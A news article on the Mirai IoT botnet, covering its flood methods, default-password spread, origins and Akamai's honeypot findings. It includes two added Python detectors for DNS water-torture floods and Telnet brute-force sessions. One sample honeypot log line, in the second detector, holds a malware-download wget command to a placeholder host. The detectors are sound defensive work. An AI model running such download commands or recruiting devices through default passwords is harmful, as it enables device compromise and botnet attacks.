Now that its source code has been released you can expect more attacks from Mirai, the malware behind the largest DDoS attack on record, which was powered by hijacked IoT devices.
Since the release of that code last week it has been responsible for smaller attacks that look like newcomers experimenting with the malware in preparation for bigger things, say security researchers at Imperva. “Likely, these are signs of things to come and we expect to deal with Mirai-powered attacks in the near future,” they say in their blog post.
That concern is echoed by researchers at F5, who say, “we can definitely expect the IoT DDoSing trend to rise massively in the global threat landscape.”
The historic attacks over the past two weeks that took down the popular KrebsOnSecurity site and challenged the resources of French hosting provider OVH mark the latest spikes in DDoS volume, which means mitigation infrastructure has to be prepared for attacks that are three to five times as large, according to Josh Shaul, vice president of web security for Akamai.
He says that despite the power of the attacks – up to 1Tbps – there’s nothing special about Mirai, which is named for the anime character Mirai Suenaga. “Usually the cool stuff is the exploits or the ability of the malware to hide or be persistent. Mirai can persist through a reboot of the infected device, but it’s not super sophisticated.”
It gets onto devices by being installed after attackers log in with default passwords. Mirai then connects to an IRC-type service where it waits for commands. It doesn’t try to hide from forensic analysis, probably because the type of device it’s on won’t have an owner who is skilled enough to look for it. “It’s no Stuxnet,” he says.
The malware locates victims by scanning broad ranges of IP addresses for IoT devices with easily guessable passwords, Imperva says. It’s got a number of DDoS attack methods in its playbook, including GRE, SYN, ACK, DNS, UDP and Simple Text Oriented Message Protocol (STOMP) floods.
The DNS attacks include the uncommon DNS Water Torture attack, which overloads the DNS servers used to resolve queries about the actual target, F5 says. When one server gets overloaded, the queries are retransmitted to another of the target’s DNS servers, and so on, until legitimate traffic can’t be directed to the target.
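The water-torture pattern F5 describes has a recognisable footprint in a resolver’s logs: a burst of distinct, never-repeated labels under one victim zone, almost all answered NXDOMAIN. The following Python is an added example, not code from the article, F5 or Imperva; the log line format (epoch, client IP, queried name, response code) and the sample lines are constructed assumptions, and the thresholds are illustrative.

```python
"""Flag a DNS water-torture (random-subdomain) flood in a resolver query log.

Added example, not part of the original article. The line format
"<epoch> <client> <qname> <rcode>" is an assumption, and the sample
lines below are constructed for illustration.
"""
from collections import defaultdict

# Constructed sample: six random labels under example.com answer NXDOMAIN,
# mixed with ordinary traffic that resolves normally.
SAMPLE_LOG = """\
1475400000 198.51.100.10 www.example.com. NOERROR
1475400001 203.0.113.5 a8f3k2.example.com. NXDOMAIN
1475400001 203.0.113.5 z91mq0.example.com. NXDOMAIN
1475400002 203.0.113.6 qwe7ty.example.com. NXDOMAIN
1475400002 203.0.113.7 pl0okm.example.com. NXDOMAIN
1475400003 203.0.113.5 mnb5vc.example.com. NXDOMAIN
1475400003 198.51.100.11 mail.example.com. NOERROR
1475400004 203.0.113.8 x2c4v6.example.com. NXDOMAIN
1475400004 198.51.100.12 www.example.net. NOERROR
1475400005 198.51.100.12 www.example.net. NOERROR
"""


def base_domain(qname: str) -> str:
    """Return the zone under attack; assumed here to be the last two labels."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def parse_log(text):
    """Yield (timestamp, client, qname, rcode); malformed lines are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, client, qname, rcode = parts
        yield int(ts), client, qname.lower(), rcode.upper()


def water_torture_report(text, min_queries=5, min_nxdomain_ratio=0.6,
                         min_unique_ratio=0.8):
    """Return {base_domain: stats} for zones that look water-tortured.

    Legitimate traffic repeats a small set of names that resolve; a flood of
    random labels is almost entirely unique and almost entirely NXDOMAIN.
    Both ratios must trip before a zone is reported.
    """
    stats = defaultdict(lambda: {"queries": 0, "nxdomain": 0,
                                 "names": set(), "clients": set()})
    for _, client, qname, rcode in parse_log(text):
        s = stats[base_domain(qname)]
        s["queries"] += 1
        s["names"].add(qname)
        s["clients"].add(client)
        if rcode == "NXDOMAIN":
            s["nxdomain"] += 1

    flagged = {}
    for dom, s in stats.items():
        if s["queries"] < min_queries:
            continue  # too little data to judge
        nx_ratio = s["nxdomain"] / s["queries"]
        uniq_ratio = len(s["names"]) / s["queries"]
        if nx_ratio >= min_nxdomain_ratio and uniq_ratio >= min_unique_ratio:
            flagged[dom] = {
                "queries": s["queries"],
                "nxdomain_ratio": round(nx_ratio, 2),
                "unique_ratio": round(uniq_ratio, 2),
                "clients": len(s["clients"]),
            }
    return flagged


if __name__ == "__main__":
    for dom, info in water_torture_report(SAMPLE_LOG).items():
        print(f"possible water-torture flood against {dom}: {info}")
```

On the constructed sample only example.com is reported (eight queries, 75% NXDOMAIN, every name unique, six distinct clients); example.net has too few queries to judge. In practice the report is a cue to rate-limit or drop queries for the affected zone at the resolver rather than forward them to the victim’s authoritative servers.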
Akamai’s Shaul says attackers are using smaller packets in their attacks, which stresses the networking equipment near the targeted servers as well as the servers themselves. Routers have to spend processing power for each packet regardless of length, so boosting the sheer number of packets can cause network bottlenecks.
He says Akamai has observed this effect. “With less traffic but more packets, you can break the network gear in the middle,” he says. “We saw both sides of that equation in those attacks last week.”
Who’s behind it?
“One of the most interesting things revealed by the code was a hardcoded list of IPs Mirai bots are programmed to avoid when performing their IP scans,” Imperva says. Those include the U.S. Department of Defense, the U.S. Post Office, HP, GE and the Internet Assigned Numbers Authority.
That leads the Imperva researchers to speculate that the creators of the malware are naïvely trying to avoid attention by eliminating those IP ranges, then following up by using it to launch one of the most scrutinized attacks ever. “Together these paint a picture of a skilled, yet not particularly experienced, coder who might be a bit over his head,” they write, but not a veteran cyber criminal.
The code uses English for its command and control interface but also contains strings in Russian. “This opens the door for speculation about the code’s origin, serving as a clue that Mirai was developed by Russian hackers or—at least—a group of hackers, some of whom were of Russian origin,” they write.
Whoever is behind Mirai might have launched the big attacks as a demonstration of its capabilities, so that the threat of a similar attack could be used to extort cash from potential victims, Shaul says.
Those who download the software might be someone who has assembled a general-purpose botnet and wants to weaponize it as a DDoS army that could be used, say, in a DDoS-for-hire business. “I’d be surprised if we don’t see that happen,” he says. “The person who’s got the skills to do botfarming may not have the skills to do DDoS.”
Individuals probably won’t download Mirai to carry out a spiteful DDoS attack because it’s much more efficient to hire a service, he says.
Recruiting IoT botnets has a lot of advantages over trying to compromise PCs and servers, experts say:
- Many IoT devices have publicly exposed administrative ports protected only by default passwords.
- The devices lack security software such as anti-virus.
- Residential customers and small businesses that lack security sophistication are in charge of protecting the devices.
- Typically IoT gear is connected to the internet all the time.
- Attackers don’t have to deal with social engineering, email poisoning or expensive zero day attacks.
Akamai came across what came to be known as Mirai via a honeypot it set up last summer that drew attempts to log into the box. Most of the attempts came from China, Shaul says, and most were trying to log in as root. Many of the passwords being tried against the honeypot were the default passwords of specific IoT devices – closed-circuit cameras and DVRs.
Sometimes the attacking sessions would issue shell commands at the login prompt, indicating that the malware had a bug that left it blind to the fact that its login attempt had failed, so it ran commands as if it had logged in successfully. The commands were attempts to download the Mirai malware.
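The two behaviours Akamai saw on its honeypot, rapid login attempts against default accounts and shell commands typed into a session that never authenticated, are both cheap to spot in a Telnet honeypot log. The Python below is an added example, not Akamai’s tooling or anything from the article; the line format, the sample lines and the thresholds are constructed assumptions, and the download URL in the sample uses the reserved `.invalid` domain.

```python
"""Analyse a Telnet honeypot log for Mirai-style behaviour.

Added example, not part of the original article or Akamai's tooling.
The line format is an assumption:
    <epoch> <src_ip> LOGIN <username> <OK|FAIL>
    <epoch> <src_ip> CMD <shell command as typed>
Two signals are checked: a burst of login attempts from one source, and
commands typed by a session that has not logged in (the "blind" bug the
article describes).
"""
from collections import defaultdict

# Constructed sample: one aggressive source that never authenticates but
# still issues commands, one slow source, and one legitimate-looking login.
SAMPLE_LOG = """\
1473000000 203.0.113.9 LOGIN root FAIL
1473000001 203.0.113.9 LOGIN root FAIL
1473000002 203.0.113.9 LOGIN admin FAIL
1473000002 203.0.113.9 CMD cd /tmp
1473000003 203.0.113.9 CMD wget http://example.invalid/x
1473000005 203.0.113.9 LOGIN root FAIL
1473000010 198.51.100.20 LOGIN root FAIL
1473000040 198.51.100.20 LOGIN root FAIL
1473000100 192.0.2.44 LOGIN pi OK
1473000101 192.0.2.44 CMD uname -a
"""


def parse_log(text):
    """Yield (timestamp, src, kind, rest); rest keeps spaces for CMD lines."""
    for line in text.splitlines():
        parts = line.split(maxsplit=3)
        if len(parts) < 4:
            continue
        ts, src, kind, rest = parts
        yield int(ts), src, kind, rest


def sliding_window_exceeds(times, max_attempts, window):
    """True if more than max_attempts timestamps fall inside any window seconds."""
    times = sorted(times)
    lo = 0
    for hi, t in enumerate(times):
        while t - times[lo] > window:
            lo += 1
        if hi - lo + 1 > max_attempts:
            return True
    return False


def analyse(text, max_attempts=3, window=60):
    """Return {src: report} for sources showing either Mirai-style signal."""
    per_src = defaultdict(lambda: {"attempts": [], "failures": 0, "users": set(),
                                   "logged_in": False, "blind_commands": []})
    for ts, src, kind, rest in parse_log(text):
        r = per_src[src]
        if kind == "LOGIN":
            user, result = rest.split()
            r["attempts"].append(ts)
            r["users"].add(user)
            if result == "OK":
                r["logged_in"] = True
            else:
                r["failures"] += 1
        elif kind == "CMD" and not r["logged_in"]:
            # Command issued without a successful login: the session is
            # acting as if authentication succeeded when it did not.
            r["blind_commands"].append(rest)

    report = {}
    for src, r in per_src.items():
        brute = sliding_window_exceeds(r["attempts"], max_attempts, window)
        if brute or r["blind_commands"]:
            report[src] = {
                "attempts": len(r["attempts"]),
                "failures": r["failures"],
                "users": sorted(r["users"]),
                "brute_force": brute,
                "blind_commands": list(r["blind_commands"]),
            }
    return report


if __name__ == "__main__":
    for src, info in analyse(SAMPLE_LOG).items():
        print(src, info)
```

On the sample only 203.0.113.9 is reported: four attempts in five seconds trips the rate threshold, and its two commands were typed before any successful login. The slow source stays under the threshold and the `pi` session commands only after an `OK`, so neither appears. The blind-command list is the more useful artefact for a defender, since it captures the download locations that the malware is trying to fetch from.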
That gave Akamai researchers something to compare actual attack traffic to.
Akamai tracked down some of the hosts in the botnet and found they were closed-circuit cameras and DVR systems. So the packets being sent matched what Mirai sends, and the devices in the attacks were the types Mirai preys upon.